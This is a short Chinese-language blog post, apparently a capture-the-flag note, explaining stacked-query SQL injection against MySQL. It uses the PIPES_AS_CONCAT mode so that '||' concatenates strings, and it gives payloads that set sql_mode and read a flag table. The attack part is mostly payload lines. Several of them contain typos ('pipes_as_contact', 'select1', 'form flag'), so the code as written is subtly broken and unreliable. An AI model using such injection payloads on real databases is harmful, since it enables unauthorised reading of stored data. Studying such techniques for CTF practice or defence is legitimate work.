堆疊注入
利用原理:
補充系統變數@@sql_modesql_mode:是一組mysql支持的基本語法及校驗規則
PIPES_AS_CONCAT:將“||”視為字串的連接運算子而非或運算子,這和Oracle資料庫是一樣的,也和字串的拼接函式Concat相類似
猜測后臺sql陳述句為:
select 接受的變數 || flag form flag;
payload:
1;set sql_mode=pipes_as_contact;select1;
//閉合 //設定變數 //拼接sql陳述句
*,1
//拼接起來的sql陳述句是 select *,1 || flag from flag;
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/47386.html
標籤:其他
上一篇:TCP狀態機:當服務端主動發FIN進TIME_WAIT,客戶端源埠復用會發生什么
下一篇:求大佬!!!急
